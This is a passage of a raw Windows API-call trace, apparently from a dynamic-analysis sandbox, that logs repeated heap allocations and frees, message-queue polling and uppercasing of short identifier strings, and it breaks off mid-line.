RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0101.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0101.159] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0101.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0101.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0101.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0101.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0101.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0101.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0101.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0101.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0101.159] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0101.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0101.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0101.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0101.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0101.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0101.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0101.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0101.159] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0101.160] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0101.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0101.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0101.160] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0101.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0101.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9af0 [0101.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74868 [0101.160] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0101.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0101.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0101.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0101.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0101.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0101.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0101.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0101.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0101.160] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0101.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0101.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0101.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0101.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0101.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0101.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0101.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0101.160] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0101.161] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0101.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0101.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0101.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0101.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0101.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0101.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0101.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0101.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0101.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0101.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0101.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0101.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74868 | out: hHeap=0x2af0000) returned 1 [0101.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0101.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0101.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0101.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0101.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0101.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0101.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0101.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0101.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0101.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0101.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0101.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0101.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0101.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0101.161] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0101.162] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0101.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0101.162] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0101.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0101.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9af0 [0101.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73e90 [0101.162] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0101.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0101.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0101.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0101.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0101.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0101.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0101.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0101.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0101.162] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0101.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0101.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0101.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0101.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0101.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0101.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0101.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0101.162] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0101.162] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0101.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0101.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0101.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0101.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0101.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0101.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0101.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0101.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0101.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0101.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0101.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0101.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0101.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0101.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0101.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0101.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0101.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0101.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.163] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73e90 | out: hHeap=0x2af0000) returned 1 [0101.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0101.163] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0101.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0101.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.163] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0101.163] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0101.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0101.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0101.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0101.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0101.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0101.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0101.164] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0101.164] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0101.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0101.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0101.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0101.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0101.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0101.164] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0101.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0101.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0101.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0101.164] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0101.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0101.164] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0101.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0101.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0101.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0101.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0101.165] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0101.165] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0101.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0101.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0101.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0101.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0101.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0101.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0101.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0101.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0101.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0101.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0101.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0101.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0101.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0101.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37f0d78 | out: hHeap=0x2af0000) returned 1 [0101.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0101.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0101.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: 